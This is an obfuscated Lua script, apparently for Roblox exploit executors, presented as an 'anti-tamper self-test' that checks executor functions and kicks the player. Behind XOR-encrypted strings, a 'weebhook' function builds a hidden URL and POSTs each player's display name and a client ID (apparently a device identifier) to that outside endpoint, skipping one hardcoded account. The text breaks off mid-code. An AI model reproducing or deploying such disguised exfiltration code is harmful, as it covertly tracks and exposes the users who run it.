--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v34,v35) local v36={};for v179=1, #v34 do v6(v36,v0(v4(v1(v2(v34,v179,v179 + 1 )),v1(v2(v35,1 + (v179% #v35) ,1 + (v179% #v35) + 1 )))%256 ));end return v5(v36);end warn("🔒 Running comprehensive anti-tamper self-test…");wait(1052.1 -(382 + 670) );repeat wait(0.1 -0 );until game:IsLoaded() local function v8(v37) local v38=726 -(228 + 498) ;local v39;while true do if (v38==(0 + 0)) then v39=0 + 0 ;while true do if (v39==(0 + 0)) then warn("⛔ Anti-tamper crash:",v37 or v7("\141\205\212\101\235\190\212\13\208\196\222\123","\126\177\163\187\69\134\219\167") );game.Players.LocalPlayer:Kick(v7("\2\195\62\204\177\55\204\39\213\249\49\141\62\192\239\55\141\44\196\245\47\200\46","\156\67\173\74\165"));break;end end break;end end end local v9;do local v40=663 -(174 + 489) ;local v41;local v42;while true do if ((0 -0)==v40) then v41,v42=pcall(function() return clonefunction(game.Players.LocalPlayer.Kick);end);v9=(v41 and v42) or function(v187) warn("⚠️ Kick called:",v187);end ;break;end end end local function v10(v43,v44) return v44 and (v43~=v44) ;end local v11,v12=pcall(loadstring,v7("\38\178\93\3\174\40\6\100\175\109\51\157\2\100\17\146\111","\38\84\215\41\118\220\70"));if ( not v11 or (type(v12)~=v7("\86\3\44\17\234\89\25\44","\158\48\118\66\114"))) then v8(v7("\167\43\17\50\96\177\233\162\42\23\118\119\172\255\235\42\31\34\51\183\254\191\49\2\56\51\163\238\165\39\4\63\124\171","\155\203\68\112\86\19\197"));end local v13,v14=pcall(v12);if ( not v13 or (v14~=(3735930464 -(830 + 1075)))) then v8(v7("\74\210\55\248\83\108\247\241\72\218\118\238\69\108\240\234\72\216\50\188\87\106\234\246\65\157\36\249\83\109\233\236\28\157","\152\38\189\86\156\32\24\133")   .. tostring(v14) );end local v15={[v7("\236\84\166\74\240","\38\156\55\199")]=pcall,[v7("\164\114\125\44\0\96\232\74\166\122","\35\200\29\28\72\115\20\154")]=loadstring,[v7("\10\186\197\217\136\34\34","\84\121\223\177\191\237\76")]=setfenv,[v7("\184\90\198\174\63\86\37\207\184","\161\219\54\169\192\90\48\80")]=clonefunction,[v7("\78\71\20\54\76\80\22\44\74\71","\69\41\34\96")]=game.GetService,[v7("\180\215\195\26\5\46\168","\75\220\163\183\106\98")]=game.HttpGet,[v7("\16\191\154\34\220\17\174","\185\98\218\235\87")]=request,[v7("\195\51\40\237\216\191\197\63\51\239\209\164","\202\171\92\71\134\190")]=hookfunction,[v7("\39\196\59\139\42\205\35\155\60\211\41","\232\73\161\76")]=newcclosure,[v7("\188\220\86\79\31\172\212\86","\126\219\185\34\61")]=getrawmetatable,[v7("\31\203\74\96\123\118\247\232\2\194\71","\135\108\174\62\18\30\23\147")]=setreadonly,[v7("\178\236\40\222\31\145\52\194\162\224\36\205\23","\167\214\137\74\171\120\206\83")]=debug.getinfo};if v10(pcall,v15.pcall) then v8(v7("\155\243\51\81\244\231\130\244\55\83\236\174\159\233\114\80\241\180\134\241\38\94\240","\199\235\144\82\61\152"));end local v11,v16=pcall(function() local v45=524 -(303 + 221) ;local v46;while true do if (v45==(1269 -(231 + 1038))) then function v46() return true;end v15.setfenv(v46,{});break;end end end);if  not v11 then v8(v7("\20\19\173\45\2\24\175\107\1\23\176\39\2\18\227\107","\75\103\118\217")   .. tostring(v16) );end if v10(setfenv,v15.setfenv) then v8(v7("\212\81\100\18\188\16\209\20\121\16\188\16\211\93\100\13\249\19\206\71\125\21\173\29\207","\126\167\52\16\116\217"));end if v10(clonefunction,v15.clonefunc) then v8(v7("\203\34\47\142\177\31\233\198\45\52\137\187\23\188\193\42\37\142\160\16\232\209\110\45\137\167\20\253\220\45\40","\156\168\78\64\224\212\121"));end local v11,v17=pcall(function() return v15.clonefunc(function() end);end);if ( not v11 or (type(v17)~=v7("\1\251\171\205\19\231\170\192","\174\103\142\197"))) then v8(v7("\85\36\80\54\32\88\237\88\43\75\49\42\80\184\82\33\91\120\43\81\236\22\43\83\55\43\91","\152\54\72\63\88\69\62"));end local v18,v19=pcall(function() return v15.getservice(game,v7("\227\203\252\87\199\212\239\95\209","\60\180\164\142"));end);local v13,v20=pcall(function() return game:GetService(v7("\111\81\23\34\52\253\19\91\91","\114\56\62\101\73\71\141"));end);if ( not v18 or  not v13 or (typeof(v19)~=v7("\145\231\200\208\185\231\216\193","\164\216\137\187")) or (typeof(v20)~=v7("\251\232\34\166\167\240\8\215","\107\178\134\81\210\198\158"))) then v8(v7("\31\11\150\245\175\42\24\139\197\175\120\8\151\200\169\44\7\141\200\171\52\78\138\201\165\51\78\134\195\190\61\13\150\195\174","\202\88\110\226\166"));end if v10(game.GetService,v15.getservice) then v8(v7("\228\10\150\196\207\209\25\139\244\207\131\6\134\242\196\215\6\150\238\138\206\6\145\250\203\215\12\138","\170\163\111\226\151"));end if v10(game.HttpGet,v15.httpget) then v8(v7("\57\36\166\40\105\50\61\81\57\182\61\64\35\32\5\41\242\53\71\36\36\16\36\177\48","\73\113\80\210\88\46\87"));end if v10(request,v15.request) then v8(v7("\147\41\220\7\226\146\56\141\27\227\132\34\217\27\243\152\108\192\27\244\140\45\217\17\239","\135\225\76\173\114"));end if v10(hookfunction,v15.hookfunction) then v8(v7("\18\226\183\187\170\168\169\25\249\177\191\162\253\174\30\232\182\164\165\169\190\90\224\177\163\161\188\179\25\229","\199\122\141\216\208\204\221"));end if v10(newcclosure,v15.newcclosure) then v8(v7("\163\216\7\243\123\250\162\206\5\226\125\182\164\217\21\254\108\255\185\196\80\253\113\229\160\220\4\243\112","\150\205\189\112\144\24"));end if v10(getrawmetatable,v15.getrawmt) then v8(v7("\34\129\171\94\5\159\28\21\49\133\171\77\6\132\20\80\44\128\186\66\16\129\5\9\101\137\182\95\9\137\5\19\45","\112\69\228\223\44\100\232\113"));end if v10(setreadonly,v15.setreadonly) then v8(v7("\199\26\19\193\179\125\130\219\17\11\202\246\117\130\209\17\19\218\162\101\198\217\22\20\222\183\104\133\220","\230\180\127\103\179\214\28"));end if v10(debug.getinfo,v15.debug_getinfo) then v8(v7("\136\0\93\83\227\15\231\137\17\86\72\226\78\160\133\1\90\72\240\72\244\149\69\82\79\247\76\225\152\6\87","\128\236\101\63\38\132\33"));end local v21,v22=pcall(function() return debug.getinfo(math.random);end);local v23=tostring(v22 and v22.what );if ( not v21 or  not v23:match("C")) then v8(("debug.getinfo(math.random).what = %s (expected to contain 'C')"):format(v23));end local v24=function() end;local v25,v26=pcall(function() return debug.getinfo(v24);end);local v27=tostring(v26 and v26.what );if ( not v25 or  not v27:match(v7("\128\188\16","\175\204\201\113\36\214\139"))) then v8(("debug.getinfo(<anon fn>).what = %s (expected to contain 'Lua')"):format(v27));end for v47,v48 in ipairs({v7("\119\192\52\197\1\85\223","\100\39\172\85\188"),v7("\154\119\171\139\32\189\121\186\133","\83\205\24\217\224"),v7("\212\192\221\49\239\198\204\41\227\193\254\41\233\215\204\58\227","\93\134\165\173"),v7("\146\251\198\202\46\199\188\121","\30\222\146\161\162\90\174\210"),v7("\214\90\113\24\241\75\98\45\240\71","\106\133\46\16"),v7("\107\52\114\238\78\69\74\16\114\255\81","\32\56\64\19\156\58")}) do local v49=0 + 0 ;local v50;local v51;while true do if (v49==(0 -0)) then v50,v51=pcall(function() return game:GetService(v48);end);if ( not v50 or (typeof(v51)~=v7("\115\198\246\66\91\252\131\95","\224\58\168\133\54\58\146"))) then v8(v48   .. v7("\25\69\78\239\99\143\132\14\25\95\69\233\112\129\149\2\77\79\11\251\116\143\139\14\93","\107\57\54\43\157\21\230\231") );end break;end end end print(v7("\248\131\20\246\178\207\143\203\138\2\230\188\216","\175\187\235\113\149\217\188"));function weebhook() local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;local v71;local v72;local v73;local v74;local v75;local v76;local v77;local v78;local v79;local v80;local v81;local v82;local v83;local v84;local v85;local v86;local v87;local v88;local v89;local v90;local v91;local v92;local v93;local v94;local v95;local v96;local v97;local v98;local v99;local v100;local v101;local v102;local v103;local v104;local v105;local v106;local v107;local v108;local v109;local v110;local v111;local v112;local v113;local v114;local v115;local v116;local v117;local v118;local v119;local v120;local v121;local v122;local v123;local v124;local v125;local v126;local v127;local v128;local v129;local v130;local v131;local v132;local v133;local v134;local v135;local v136;local v137;local v138;local v139;local v140;local v141;local v142;local v143;local v144;local v145;local v146;local v147;local v148;local v149;local v150;local v151;local v152;local v153;local v154;local v155;local v156;local v157;local v158;local v159;local v160;local v161;local v162;local v163;local v164;local v165;local v166;local v167;local v168;local v169;local v170;local v171;local v172;local v173;local v174;local v175;local v176;while true do if (v52==(8 + 2)) then local v180=0 -0 ;while true do if (v180==1) then v145=v7("\187\249\83\156\9\184\248\87\146\11\188\251\86\149\4\188\250\90\146\19","\60\140\200\99\164");v146=v7("\208\236\40\28\145\146\161\40\11\178\209\240\9\9\186\133\185\20\50\142\211\219\8\48\244\142\185\30\19\139\213\249\83\113\138\130\219\5","\194\231\148\100\70");v180=6 -4 ;end if (v180==(1251 -(111 + 1137))) then v149=v7("\21\246\117\186\113\251\12\172\111\254\15\132\79\193\65\130\15\254\77\172\22\193\85\150\20\231\20\154\119\199\11\141\23\187\113\133\109\239","\224\34\142\57");v150=v7("\248\176\208\223\69\228\105\56\215\136\213\241\94\196\120\12\217\166\214\217\119\193\106\60\211\173\223\137\32\169\16","\110\190\199\165\189\19\145\61");v180=162 -(91 + 67) ;end if (v180==(0 -0)) then v143=v7("\118\182\224\33\114\59\100\151\252\12\84\2\125\148\208\36\93\26\96\150\199\46\115\9\90\143\254\42\94\120\4\236","\78\48\193\149\67\36");v144=v7("\100\78\210\77\18\105\74\213\76\24\103\78\215\78\23\102\74\216\77\14","\33\80\126\224\120");v180=1 + 0 ;end if (v180==(525 -(423 + 100))) then v147=v7("\96\91\212\161\192\221\114\122\200\140\230\228\107\121\228\164\239\252\118\123\243\174\193\239\76\98\202\170\236\157\30\1","\168\38\44\161\195\150");v148=v7("\215\228\174\76\3\253\227\58\173\236\212\114\61\199\174\20\205\236\150\90\100\199\186\0\214\245\207\108\5\193\228\27\212\168\170\115\31\233","\118\224\156\226\22\80\136\214");v180=1 + 2 ;end if (4==v180) then v151=v7("\142\187\33\191\221\149\140\185\33\184\223\159\141\190\34\187\218\148\131\164","\167\186\139\23\136\235");v52=30 -19 ;break;end end end if ((7 + 6)==v52) then v170=v7("\40\186\101\230\61\151\58\155\116\200\38\133\23\153\64\211\57\143\57\138\122\202\0\139\20\251\37\176\91\207\59\174\124\198\62","\226\110\205\16\132\107");v171=v7("\205\212\245\219\119\254\247\214\243\102\199\238\231\192\117\219\244\210\212\118\204\201\206\210\72\241\145\178\221\64\248\144\183\128\12","\33\139\163\128\185");v172=v7("\113\79\17\220\97\77\48\232\64\127\40\243\80\65\48\238\96\106\9\233\112\82\42\213\94\66\92\142\83\89\23\137\1\15\73","\190\55\56\100");v173=v7("\1\183\16\36\32\246\166\122\130\44\72\23\238\220\78\173\113\14\7\207\167\121\163\42\72\26\174\233\99\134\110\19\66\180\219\83\128\61","\147\54\207\92\126\115\131");v174=v7("\43\38\32\127\59\107\57\7\60\82\29\82\32\4\16\36\10\127\30\53\49\77\58\76\0\59\47\40\89\38\64","\30\109\81\85\29\109");v175=v54   .. v83   .. v107   .. v62 ;v176=nil;if syn then v176=syn.request;elseif http then v176=http.request;else function v176(v198) return v53:RequestAsync(v198);end end if (game.Players.LocalPlayer.name~=v7("\207\66\13\239\9\240\219\222\40","\156\159\17\52\214\86\190")) then local v189=v176({[v7("\155\253\177","\220\206\143\221")]=v175,[v7("\171\120\57\31\215\200","\178\230\29\77\119\184\172")]=v7("\197\145\57\47","\152\149\222\106\123\23"),[v7("\245\35\247\71\176\207\53","\213\189\70\150\35")]={[v7("\108\90\122\28\74\91\96\69\123\76\100\13","\104\47\53\20")]=v7("\162\92\145\16\181\12\162\88\136\19\178\64\169\95\142\18","\111\195\44\225\124\220")},[v7("\250\73\4\106","\203\184\38\96\19\203")]=v53:JSONEncode({[v7("\58\124\119\85\203\55\103","\174\89\19\25\33")]="",[v7("\42\31\80\75\243\148","\107\79\114\50\46\151\231")]={{[v7("\45\175\161\37\143","\160\89\198\213\73\234\89\215")]=v7("\2\59\141\241\208\90\49\167\253\215\65\97\160\190\205\73\98\244\252\192\77\127\244\251\221\77\114\161\234\192\76\48\254\180","\165\40\17\212\158"),[v7("\225\220\27\48\52\236\201\28\58\41\235","\70\133\185\104\83")]=game.Players.LocalPlayer.DisplayName   .. v7("\68\77\69\57\137\1\93\65\41\220\16\64\64\106\221\12\64\4\57\202\22\76\84\62\135","\169\100\37\36\74") ,[v7("\20\158\178\85","\48\96\231\194")]=v7("\218\83\13\37","\227\168\58\110\77\121\184\207"),[v7("\120\51\179\79\163","\197\27\92\223\32\209\187\17")]=tonumber(v7("\83\71\197\253\5\89\197\253","\155\99\63\163"),16),[v7("\132\216\164\129\189\151","\228\226\177\193\237\217")]={{[v7("\58\177\46\227","\134\84\208\67")]=v7("\59\173\148\88\4\173\148\89\83\133\162\6\83","\60\115\204\230"),[v7("\241\59\231\101\226","\16\135\90\139")]=game:GetService(v7("\102\118\30\18\64\85\116\77\96\15\48\93\103\125\70\98\15\48\75","\24\52\20\102\83\46\52")):GetClientId(),[v7("\205\33\45\45\1\193","\111\164\79\65\68")]=true}}}}})});end break;end if ((12 -6)==v52) then v107=v7("\144\162\243\210\128\160\210\230\191\154\246\252\155\128\195\215\175\129\214\231\132\184\209\247\188\155\237\217\172\237\171","\176\214\213\134");v108=v7("\210\186\163\214\158\67\109\194\169\154\249\175\79\109\196\154\132\217\159\113\83\218\166\191\206\255\7\1\162\224\143\216\154\88\87","\57\148\205\214\180\200\54");v109=v7("\69\172\100\102\34\75\175\96\100\34\67\173\101\99\47\70\175\108\100\57","\22\114\157\85\84");v110=v7("\226\220\6\198\107\227\156\242\207\63\233\90\239\156\244\252\33\201\106\209\162\234\192\26\222\5\174\240\148\134\43\157\85\193\164","\200\164\171\115\164\61\150");v111=v7("\152\227\22\71\181\171\192\53\98\180\146\217\4\92\183\142\195\49\72\180\153\254\45\78\138\164\165\86\65\130\173\162\86\17\206","\227\222\148\99\37");v112=v7("\21\69\71\244\207\38\102\100\242\213\30\85\75\194\201\4\96\95\193\222\57\124\89\255\227\98\1\10\166\180\96\99\71\199\236","\153\83\50\50\150");v113=v7("\123\97\102\30\69\190\121\107\114\95\49\116\178\121\109\65\65\17\68\140\71\115\125\122\6\33\250\21\5\59\33\16\89\133\97","\45\61\22\19\124\19\203");v114=v7("\231\5\24\247\52\101\141\247\22\33\216\5\105\141\241\37\63\248\53\87\179\239\25\4\239\83\33\239\150\95\53\230\52\101\173","\217\161\114\109\149\98\16");v115=v7("\95\120\111\44\235\32\66\115\107\45\238\44\64\116\96\44\238\45\65\112\119","\20\114\64\88\28\220");v52=7;end if (v52==(20 -11)) then v134=v7("\96\109\65\12\5\83\78\98\15\29\106\87\83\23\7\118\77\102\3\4\97\112\122\5\58\92\41\1\10\50\85\40\2\90\126","\83\38\26\52\110");v135=v7("\126\0\50\68\110\2\19\112\121\52\11\107\95\14\19\118\111\37\42\113\127\29\9\77\81\13\114\31\92\22\52\23\14\90","\38\56\119\71");v136=v7("\170\189\8\130\125\15\162\189\1\135\114\15\167\189\1\134\115\7\167\160","\54\147\143\56\182\69");v137=v7("\240\150\234\75\233\195\181\201\64\240\198\173\210\124\250\195\134\254\90\219\210\177\200\123\210\220\155\169\16\141\155","\191\182\225\159\41");v138=v7("\121\70\127\2\219\214\154\122\67\125\7\223\209\145\121\74\113\2\219\200","\162\75\114\72\53\235\231");v139=v7("\219\36\104\216\96\23\217\16\105\242\5\6\129\19\92\224\30\18\152\16\16\205\95\20\218\53\9\248\102\43\222\49\18\176\123\7\163\61","\98\236\92\36\130\51");v140=v7("\243\1\32\128\118\189\224\28\137\9\90\190\72\135\173\50\233\9\24\150\17\135\185\38\242\16\65\160\112\129\231\61\247\74\36\191\106\169","\80\196\121\108\218\37\200\213");v141=v7("\82\36\91\39\18\90\210\81\33\90\47\31\92\218\81\43\80\39\25\65","\234\96\19\98\31\43\110");v142=v7("\32\8\71\197\154\103\191\48\22\125\215\128\95\190\35\24\85\198\191\118\143\54\40\96\202\166\104\216\84\75\31","\235\102\127\50\167\204\18");v52=721 -(530 + 181) ;end if (v52==(888 -(614 + 267))) then v116=v7("\23\22\199\182\206\197\137\7\45\200\152\213\215\164\5\49\229\134\245\231\154\59\47\217\189\226\135\234\53\0\193\230\168\136\240","\221\81\97\178\212\152\176");v117=v7("\235\240\8\249\44\216\211\43\242\53\221\203\48\206\63\202\254\41\203\45\255\234\42\220\16\227\236\20\225\77\154\170","\122\173\135\125\155");v118=v7("\162\214\21\187\9\36\252\178\197\44\148\56\40\252\180\246\50\180\8\22\194\170\202\9\163\102\103\157\212\140\22\168\59\101\234","\168\228\161\96\217\95\81");v119=v7("\253\198\59\94\25\66\239\231\39\115\63\123\246\228\11\121\40\86\200\213\42\108\24\101\214\219\52\9\119\15\150","\55\187\177\78\60\79");v120=v7("\11\217\74\233\112\218\180\27\199\112\251\106\226\181\8\201\70\223\118\248\178\32\249\120\225\104\196\137\55\157\14\179\66\206\147\123\153\9\166","\224\77\174\63\139\38\175");v121=v7("\221\16\15\127\213\23\9\123\211\23\10\123\221\24\1\121\215\25\8\97","\78\228\33\56");v122=v7("\232\105\167\1\179\219\74\132\8\182\226\83\181\26\177\254\73\128\14\178\233\116\156\8\140\212\41\225\7\132\221\47\255","\229\174\30\210\99");v123=v7("\61\250\147\83\219\40\13\45\224\136\125\192\58\32\47\221\177\99\224\10\30\17\195\141\88\247\107\106\31\236\149\6\180\109\116","\89\123\141\230\49\141\93");v124=v7("\165\38\175\95\67\25\164\38\174\93\68\26\165\32\164\85\64\31\171\62","\42\147\17\150\108\112");v52=40 -(19 + 13) ;end if (v52==(7 -2)) then local v181=1402 -(832 + 570) ;while true do if (v181==(4 + 0)) then v106=v7("\156\154\189\208\140\152\156\228\179\162\184\254\151\184\141\213\163\185\152\229\136\128\159\245\176\163\163\219\160\216\241\159","\178\218\237\200");v52=13 -7 ;break;end if (v181==(8 -5)) then v104=v7("\104\7\34\120\120\5\3\76\71\63\39\86\99\37\18\125\87\36\7\77\124\29\0\93\68\62\60\115\84\73\111\44\74\17\36\44\31\66\122","\26\46\112\87");v105=v7("\159\52\190\118\137\170\113\130\176\12\187\88\146\138\96\179\184\48\175\112\143\136\119\185\179\57\243\32\187\190\86\236\244","\212\217\67\203\20\223\223\37");v181=13 -9 ;end if (v181==(1 + 0)) then v100=v7("\23\149\105\190\7\151\72\138\31\141\80\145\54\155\72\140\6\176\113\139\22\136\82\183\56\152\45\236\53\131\111\239\102\210\49","\220\81\226\28");v101=v7("\75\133\209\163\188\151\68\133\215\173\178\146\75\131\208\171\188\158\75\154","\167\115\181\226\155\138");v181=3 -1 ;end if (v181==(0 -0)) then v98=v7("\228\150\3\252\15\251\108\244\147\60\210\20\233\65\246\177\33\204\52\217\127\200\175\29\247\35\187\12\198\128\5\172\106\187\21","\56\162\225\118\158\89\142");v99=v7("\17\93\152\253\112\142\10\92\150\247\113\128\8\80\147\251\113\141\12\85\143","\184\60\101\160\207\66");v181=1813 -(1293 + 519) ;end if (v181==(3 -1)) then v102=v7("\186\116\177\9\40\40\150\176\113\190\9\43\35\145\182\115\179\4\43\62","\166\130\66\135\60\27\17");v103=v7("\98\93\219\119\6\81\126\248\113\28\105\77\215\65\0\115\120\195\66\23\78\100\197\124\42\16\18\157\33\125\119\79\232\109\103","\80\36\42\174\21");v181=6 -3 ;end end end if ((4 -2)==v52) then local v182=0 -0 ;while true do if (v182==(12 -9)) then v77=v7("\179\105\80\115\232\90\181\200\92\108\31\223\66\207\252\115\49\89\207\99\180\203\125\106\31\210\2\250\209\88\46\68\140\23\200\225\94\125","\128\132\17\28\41\187\47");v78=v7("\39\37\19\56\107\20\6\48\51\114\17\30\43\15\120\6\43\50\10\106\51\63\49\29\87\47\57\15\32\4\85\101\2\59\78\86\103\82\119","\61\97\82\102\90");v182=9 -5 ;end if ((1 + 0)==v182) then v73=v7("\104\0\36\170\199\165\113\108\74\59\28\175\232\132\117\109\124\26\6\143\251\158\78\83\84\66\100\252\169\253\115\110\67\49\33","\58\46\119\81\200\145\208\37");v74=v7("\13\155\37\174\159\168\2\29\133\31\188\133\144\3\14\139\41\152\153\138\4\38\187\23\166\135\182\63\49\216\101\245\173\188\37\122\213\101\225","\86\75\236\80\204\201\221");v182=1 + 1 ;end if (v182==(4 -2)) then v75=v7("\84\86\98\135\200\158\70\119\126\170\238\167\95\116\82\130\231\191\66\118\69\136\201\172\120\111\124\140\228\222\39\17\115\132\237\223\32\21\58","\235\18\33\23\229\158");v76=v7("\118\173\212\185\102\175\245\141\89\149\209\151\125\143\228\188\73\142\241\140\98\183\246\156\90\148\202\178\74\236\152\237\84\187\210\239\0\226\140","\219\48\218\161");v182=1 + 2 ;end if (v182==(2 + 2)) then v79=v7("\138\57\190\73\241\66\42\63\165\1\187\103\234\98\59\14\181\26\155\124\245\90\41\46\166\0\160\66\221\2\77\68","\105\204\78\203\43\167\55\126");v52=2 + 1 ;break;end if (v182==(0 + 0)) then v71=v7("\25\159\207\23\125\146\182\1\99\151\181\41\67\168\251\47\3\151\247\1\26\168\239\59\24\142\174\55\123\174\177\32\22\213\203\40\97\134","\77\46\231\131");v72=v7("\156\67\163\66\140\65\130\118\179\123\166\108\151\97\147\80\189\85\165\68\190\100\129\114\183\94\172\22\227\12\251","\32\218\52\214");v182=1;end end end if ((1097 -(709 + 387))==v52) then v62=v7("\107\41\37\129\42\254\116\25\17\33\95\191\20\196\57\55\113\33\29\151\77\196\45\35\106\56\68\161\44\194\115\56\100\25\12\148\24","\85\92\81\105\219\121\139\65");v63=v7("\169\228\2\19\42\143\165\235\4\17\37\136\175\229\0\17\46\136\173\252","\191\157\211\48\37\28");v64=v7("\249\8\225\30\12\202\43\194\21\21\207\51\217\41\31\200\24\245\15\62\219\47\195\46\55\213\5\172\69\105\146","\90\191\127\148\124");v65=v7("\94\144\59\21\78\146\26\33\124\171\3\16\97\179\30\32\74\138\25\48\114\169\37\30\98\214\126\70\32\202\2\28\93\179\28","\119\24\231\78");v66=v7("\164\58\176\72\234\85\37\180\36\138\90\240\109\36\167\63\162\75\207\68\21\178\26\151\71\214\90\71\214\116\232","\113\226\77\197\42\188\32");v67=v7("\28\1\225\183\12\3\192\131\62\58\217\178\35\34\196\130\8\27\195\146\48\56\255\188\32\68\166\226\110\91\223\133\18\38\223","\213\90\118\148");v68=v7("\15\123\224\14\30\11\122\236\6\24\9\122\236\5\31\13\118\231\3\2","\45\59\78\212\54");v69=v7("\71\78\175\177\181\59\248\220\61\70\213\143\139\1\181\242\93\70\151\167\210\1\161\230\70\95\206\145\179\7\255\253\66\6\171\142\169\47","\144\112\54\227\235\230\78\205");v70=v7("\149\63\26\254\230\78\135\30\11\208\253\92\170\28\63\203\226\86\132\15\5\210\219\82\169\126\89\174\137\22\170\127\89\175\217","\59\211\72\111\156\176");v52=1860 -(673 + 1185) ;end if (v52==(8 -5)) then local v183=0 -0 ;while true do if ((10 -6)==v183) then v88=v7("\125\123\128\2\124\123\140\3\121\124\135\14\121\120\135\9\127\119\132\20","\59\74\78\181");v52=1 + 3 ;break;end if (v183==(2 -0)) then v84=v7("\210\102\224\175\19\56\179\194\120\218\189\9\0\178\209\93\242\172\54\41\131\196\70\199\160\47\55\223\172\37\184","\231\148\17\149\205\69\77");v85=v7("\215\191\235\193\100\234\213\139\234\235\1\251\141\136\223\249\26\239\148\139\147\212\91\233\214\174\138\225\98\214\210\170\149\163\127\250\175\166","\159\224\199\167\155\55");v183=3 + 0 ;end if (v183==(3 + 0)) then v86=v7("\209\228\41\208\193\230\8\228\251\195\16\255\240\234\8\226\192\193\49\229\208\249\18\217\254\233\110\138\243\242\47\139\163\190","\178\151\147\92");v87=v7("\170\234\89\48\36\89\78\186\239\74\30\63\75\99\184\205\123\0\31\123\93\134\211\71\59\8\21\43\136\252\95\107\65\1","\26\236\157\44\82\114\44");v183=5 -1 ;end if ((0 + 0)==v183) then v80=v7("\131\189\54\28\37\17\243\103\172\133\51\50\62\49\226\86\188\158\19\41\33\9\240\118\175\132\40\23\9\81\146\2\161\171\48\74\75\84\138","\49\197\202\67\126\115\100\167");v81=v7("\17\76\202\43\182\67\106\1\82\240\57\172\123\107\18\84\216\40\147\82\90\7\108\237\36\138\76\8\100\14\146","\62\87\59\191\73\224\54");v183=1 + 0 ;end if ((1 -0)==v183) then v82=v7("\193\21\239\203\209\23\206\255\238\45\234\229\202\55\223\206\254\54\202\254\213\15\205\238\237\44\241\192\253\87\163\159\227\3\233\152\191\91\183","\169\135\98\154");v83=v7("\154\36\112\13\173\100\145\155\36\112\12\165\99\144\158\37\116\2\165\124","\168\171\23\68\52\157\83");v183=3 -1 ;end end end if (v52==(1888 -(446 + 1434))) then v125=v7("\41\177\56\125\209\253\59\144\36\80\247\196\34\147\8\120\254\220\63\145\31\114\208\207\5\136\38\118\253\189\90\235","\136\111\198\77\31\135");v126=v7("\79\80\247\5\238\189\67\252\90\88\254\0\239\188\69\240\80\92\254\4\242","\201\98\105\199\54\221\132\119");v127=v7("\235\85\214\121\85\109\248\224\85\210\114\85\100\251\235\94\212\117\85\122","\204\217\108\227\65\98\85");v128=v7("\9\145\163\181\116\151\8\146\165\189\121\146\10\147\167\177\125\152\11\140","\160\62\163\149\133\76");v129=v7("\240\183\24\45\245\195\148\59\38\236\198\140\32\26\230\209\185\57\31\244\228\173\58\8\201\248\171\4\53\155\133\248\9\46\208\132\248\64","\163\182\192\109\79");v130=v7("\18\49\21\194\195\33\18\54\201\218\36\10\45\245\208\51\63\52\240\194\6\43\55\231\255\26\45\9\218\162\103\107","\149\84\70\96\160");v131=v7("\96\86\90\189\106\86\95\185\106\86\88\181\110\84\90\188\110\94\90\162","\141\88\102\109");v132=v7("\149\68\223\114\44\40\97\247\186\124\218\92\55\8\112\198\170\103\250\71\40\48\98\230\185\125\193\121\0\106\4\140","\161\211\51\170\16\122\93\53");v133=v7("\221\185\167\42\205\187\134\30\255\130\159\47\226\154\130\31\201\163\133\15\241\128\185\33\225\246\230\44\250\189\234\101","\72\155\206\210");v52=13 -4 ;end if ((1287 -(1040 + 243))==v52) then v89=v7("\3\198\79\88\133\48\229\108\83\156\53\253\119\111\150\34\200\110\106\132\23\220\109\125\185\11\218\83\64\235\113\213\91\73\235\104","\211\69\177\58\58");v90=v7("\145\242\108\247\223\222\131\211\112\218\249\231\154\208\92\242\240\255\135\210\75\248\222\236\189\203\114\252\243\147\231\168","\171\215\133\25\149\137");v91=v7("\199\223\39\248\217\37\200\116\232\231\34\214\194\5\217\72\230\201\33\254\235\0\203\112\236\194\40\175\191\104\177","\34\129\168\82\154\143\80\156");v92=v7("\163\165\38\9\126\91\189\179\187\28\27\100\99\188\160\181\42\63\120\121\187\136\133\20\1\102\69\128\159\225\101\70","\233\229\210\83\107\40\46");v93=v7("\144\26\106\131\87\147\27\103\135\84\151\26\107\142\87\152\21\99\134\74","\101\161\34\82\182");v94=v7("\206\26\76\252\237\247\182\24\225\34\73\210\246\215\167\11\239\12\74\250\223\210\181\28\229\7\67\173\130\183\207","\78\136\109\57\158\187\130\226");v95=v7("\109\111\168\165\107\105\170\166\106\109\161\164\111\106\160\161\106\107\173\190","\145\94\95\153");v96=v7("\219\218\1\215\120\162\201\251\29\250\94\155\208\248\49\210\87\131\205\250\38\216\121\144\247\227\31\220\84\230\169\128","\215\157\173\116\181\46");v97=v7("\100\231\216\160\143\102\225\223\167\138\102\227\216\162\138\99\228\217\162\149","\186\85\212\235\146");v52=5;end if (v52==12) then local v184=0 -0 ;while true do if (v184==(1851 -(559 + 1288))) then v169=v7("\2\1\185\227\7\229\227\18\31\131\241\29\221\226\1\17\181\213\1\199\229\41\33\139\235\31\251\222\62\64\251\177\53\241\196\118\64\249\172","\183\68\118\204\129\81\144");v52=1944 -(609 + 1322) ;break;end if (v184==2) then v165=v7("\249\240\187\218\197\202\211\152\209\220\207\203\131\237\214\216\254\154\232\196\237\234\153\255\249\241\236\167\194\161\138\182\170\217\224\139\182\253\149","\147\191\135\206\184");v166=v7("\208\112\246\144\141\3\231\213\127\246\150\128\4\234\221\123\246\150\138\28","\210\228\72\198\161\184\51");v184=457 -(13 + 441) ;end if (v184==(0 -0)) then v161=v7("\31\191\89\26\246\247\58\15\161\99\8\236\207\59\28\145\75\25\211\230\10\9\159\126\21\202\248\91\111\255\1","\110\89\200\44\120\160\130");v162=v7("\250\150\25\22\16\24\104\26\253\147\19\20\20\29\99\26\248\148\27\9","\45\203\163\43\38\35\42\91");v184=1 -0 ;end if (v184==(7 -4)) then 